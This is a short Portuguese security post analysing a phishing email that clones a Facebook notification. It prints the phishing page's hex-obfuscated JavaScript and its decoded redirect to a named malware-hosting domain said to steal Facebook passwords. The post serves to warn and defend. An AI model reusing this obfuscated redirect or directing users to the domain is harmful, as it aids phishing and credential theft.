Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.
Assunto do email:
[Username], you have pending messages
Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:
ip_malicioso/~up1adstop/coldness.php
O código-fonte deste site (ofuscado):
bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);
… que depois de traduzido reencaminha para outro site malicioso:
setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);
De referir que o primeiro url é detectado pelos antivirus online com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.
No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.
Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.
